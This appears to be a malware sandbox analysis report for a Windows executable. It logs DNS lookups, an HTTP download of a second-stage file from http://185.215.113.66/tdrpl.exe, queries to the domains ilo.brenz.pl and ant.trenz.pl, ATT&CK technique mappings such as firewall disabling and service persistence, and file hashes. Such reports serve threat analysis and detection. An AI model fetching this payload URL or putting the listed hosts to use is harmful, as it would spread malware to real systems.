Remote address:

8.8.8.8:53

Request

181.129.81.91.in-addr.arpa

IN PTR

Response
DNS

71.31.126.40.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

71.31.126.40.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.66/tdrpl.exe

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Remote address:

185.215.113.66:80

Request

GET /tdrpl.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.215.113.66
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 23:37:21 GMT
Content-Type: application/octet-stream
Content-Length: 80896
Last-Modified: Tue, 12 Nov 2024 22:30:59 GMT
Connection: keep-alive
ETag: "6733d723-13c00"
Accept-Ranges: bytes
DNS

66.113.215.185.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

66.113.215.185.in-addr.arpa

IN PTR

Response
DNS

212.20.149.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

23.236.111.52.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

23.236.111.52.in-addr.arpa

IN PTR

Response

88.198.69.43:80

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

208 B
4
185.215.113.66:80

http://185.215.113.66/tdrpl.exe

http

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

3.2kB
83.7kB
64
62

HTTP Request

GET http://185.215.113.66/tdrpl.exe

HTTP Response

200

8.8.8.8:53

ilo.brenz.pl

dns

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

58 B
58 B
1
1

DNS Request

ilo.brenz.pl
8.8.8.8:53

ant.trenz.pl

dns

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

58 B
58 B
1
1

DNS Request

ant.trenz.pl
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

Dnscache

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

181.129.81.91.in-addr.arpa

dns

Dnscache

72 B
147 B
1
1

DNS Request

181.129.81.91.in-addr.arpa
8.8.8.8:53

71.31.126.40.in-addr.arpa

dns

Dnscache

71 B
157 B
1
1

DNS Request

71.31.126.40.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

Dnscache

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

66.113.215.185.in-addr.arpa

dns

Dnscache

73 B
133 B
1
1

DNS Request

66.113.215.185.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

Dnscache

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

Dnscache

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

Dnscache

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

Dnscache

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

23.236.111.52.in-addr.arpa

dns

Dnscache

72 B
158 B
1
1

DNS Request

23.236.111.52.in-addr.arpa
8.8.8.8:53

Dnscache

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\tdrpl[1].exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
memory/4740-0-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/4740-1-0x0000000077C42000-0x0000000077C43000-memory.dmp

Filesize
4KB

Download
memory/4740-4-0x0000000077C43000-0x0000000077C44000-memory.dmp

Filesize
4KB

Download
memory/4740-3-0x0000000077C42000-0x0000000077C43000-memory.dmp

Filesize
4KB

Download
memory/4740-2-0x000000007FE40000-0x000000007FE4C000-memory.dmp

Filesize
48KB

Download
memory/4740-5-0x000000007FE40000-0x000000007FE4C000-memory.dmp

Filesize
48KB

Download
memory/4740-6-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/4740-18-0x000000007FE40000-0x000000007FE4C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.